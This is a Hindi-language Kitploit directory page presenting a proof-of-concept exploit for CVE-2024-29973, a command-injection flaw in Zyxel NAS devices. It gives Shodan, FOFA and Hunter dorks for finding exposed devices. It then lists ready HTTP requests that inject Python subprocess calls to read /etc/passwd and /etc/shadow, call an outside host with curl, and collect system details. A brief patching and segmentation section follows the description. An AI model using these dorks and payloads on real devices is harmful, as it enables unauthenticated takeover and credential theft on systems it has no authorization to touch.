Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-29973 — CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zyxel NAS डिवाइसों में रिमोट कमांड इंजेक्शन है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/aerchy/cve-2024-29973
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubaerchy/cve-2024-29973

CVE-2024-29973

CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Zyxel NAS डिवाइसों में रिमोट कमांड इंजेक्शन है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमाना कमांड निष्पादन प्रदर्शित करता है।

रिपॉजिटरी देखें
211 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-29973 - रिमोट कमांड इंजेक्शन भेद्यता

विवरण

CVE-2024-29973 कुछ Zyxel नेटवर्किंग उपकरणों में पाई जाने वाली एक गंभीर भेद्यता है। यह भेद्यता एक अनप्रमाणित हमलावर को फर्मवेयर में अनुचित इनपुट सत्यापन तंत्र का फायदा उठाकर लक्षित डिवाइस पर मनमाने कमांड निष्पादित करने की अनुमति देती है। हमलावर डिवाइस पर विशेष रूप से तैयार HTTP अनुरोध भेज सकते हैं, सिस्टम-स्तरीय कमांड इंजेक्ट कर सकते हैं और संभावित रूप से डिवाइस पर पूर्ण नियंत्रण प्राप्त कर सकते हैं।

डोर्क्स

Hunter: product.name="ZyXEL NAS542"||product.name="ZyXEL NAS326" FOFA: app="NAS542" || app="ZYXEL-NAS326" SHODAN: http.title:"Zyxel NAS326"

यह कैसे काम करता है

कमांड इंजेक्शन: यह भेद्यता डिवाइस के वेब इंटरफेस में से एक में अपर्याप्त इनपुट सैनिटाइजेशन के कारण उत्पन्न होती है। यह दोष हमलावरों को HTTP अनुरोधों के मापदंडों के भीतर ऑपरेटिंग सिस्टम कमांड जोड़ने की अनुमति देता है।

एक्सप्लॉइट उदाहरण: हमलावर नीचे दिए गए HTTP GET अनुरोध के माध्यम से कमांड इंजेक्ट कर सकते हैं, मनमाना कोड निष्पादित करने के लिए:

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1

प्रभाव: सफल शोषण के परिणामस्वरूप सिस्टम कमांड निष्पादित करने की क्षमता होती है, जिससे डिवाइस पर रिमोट नियंत्रण, डेटा रिसाव, या नेटवर्क से आगे समझौता हो सकता है।

रोकथाम

इस भेद्यता से जुड़े जोखिमों को कम करने के लिए, इन चरणों का पालन करें:

फर्मवेयर अपडेट: सुनिश्चित करें कि सभी Zyxel डिवाइस नवीनतम फर्मवेयर संस्करण में अपडेट किए गए हैं। Zyxel ने पैच जारी किए हैं जो इस भेद्यता को संबोधित करते हैं। नियमित रूप से अपडेट की जांच करें और उन्हें तुरंत लागू करें।

नेटवर्क विभाजन: कमजोर डिवाइसों को महत्वपूर्ण नेटवर्क बुनियादी ढांचे से अलग करें। केवल आवश्यक सेवाओं को उजागर करें और सुनिश्चित करें कि प्रशासनिक इंटरफेस सार्वजनिक रूप से सुलभ नहीं हैं।

फ़ायरवॉल कॉन्फ़िगरेशन: आने वाले और बाहर जाने वाले ट्रैफ़िक को केवल आवश्यक सेवाओं तक सीमित करें। Zyxel डिवाइसों तक अनावश्यक HTTP पहुंच को ब्लॉक करें।

संदिग्ध गतिविधि की निगरानी करें: लॉगिंग और मॉनिटरिंग टूल लागू करें जो असामान्य व्यवहार का पता लगा सकते हैं और अलर्ट कर सकते हैं, जैसे बार-बार लॉगिन प्रयास या असामान्य ट्रैफ़िक पैटर्न।

संदर्भ नेशनल वल्नरेबिलिटी डेटाबेस - CVE-2024-29973 Zyxel सुरक्षा सलाह

चित्र

alt text

POC

/etc/passwd

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/passwd",+shell=True)%23 HTTP/1.1

/etc/shadow

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/shadow",+shell=True)%23 HTTP/1.1

ifconfig

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("curl+ifconfig.me",+shell=True)%23 HTTP/1.1

hostname

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("hostname",+shell=True)%23 HTTP/1.1

ip

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("ip+a",+shell=True)%23 HTTP/1.1

uname -a

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("uname+-a",+shell=True)%23 HTTP/1.1

/etc/group

root@kitploit:~
GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("cat+/etc/group",+shell=True)%23 HTTP/1.1
टूल डाउनलोड करें